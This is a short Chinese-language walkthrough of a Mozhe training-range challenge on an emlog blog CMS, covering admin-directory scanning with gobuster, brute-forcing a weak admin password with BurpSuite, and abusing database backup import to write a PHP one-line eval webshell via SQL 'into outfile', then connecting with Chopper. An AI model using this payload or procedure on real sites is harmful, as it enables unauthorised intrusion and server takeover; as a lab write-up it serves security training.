CMS系统漏洞分析溯源(第6题)

    科技2024-12-12  18

    靶场:

    https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe

    背景介绍

    安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。

    实训目标

    1、了解验证码绕过的相关知识;

    2、了解后台地址扫描及其他相关漏洞资料;

    3、了解后台常用账户密码的利用方式;

    解题方向

    进入后台,找到后台中可利用的地方getshell;

    解题思路:

    1、使用Kali自带的工具gobuster扫描网站后台目录,如图/servlets为后台目录

    2、用户名输入mozhe777,密码随意输入,输入正确的验证码,BurpSuite开启拦截,导入字典,这里使用的是弱密码top1000,爆破出口令为qwer1234

    3、成功登录后台后利用备份/导入数据库写入一句话木马,备份数据库,下拉框选择emlog_blog:

    4、在导出的数据库文件中添加数据库语句,内容为如下

    Drop TABLE IF EXISTS emlog_shell; Create Table emlog_shell(`cmd` longtext NOT NULL); Insert INTO emlog_shell VALUES('<?php @eval($_POST[cmd]);?>'); Select cmd from emlog_shell into outfile '/var/www/html/cmd.php'; Drop TABLE IF EXISTS emlog_shell;

    5、将修改后的数据库文件导入本地备份

    6、使用菜刀连接,在根目录下找到key

    Processed: 0.022, SQL: 8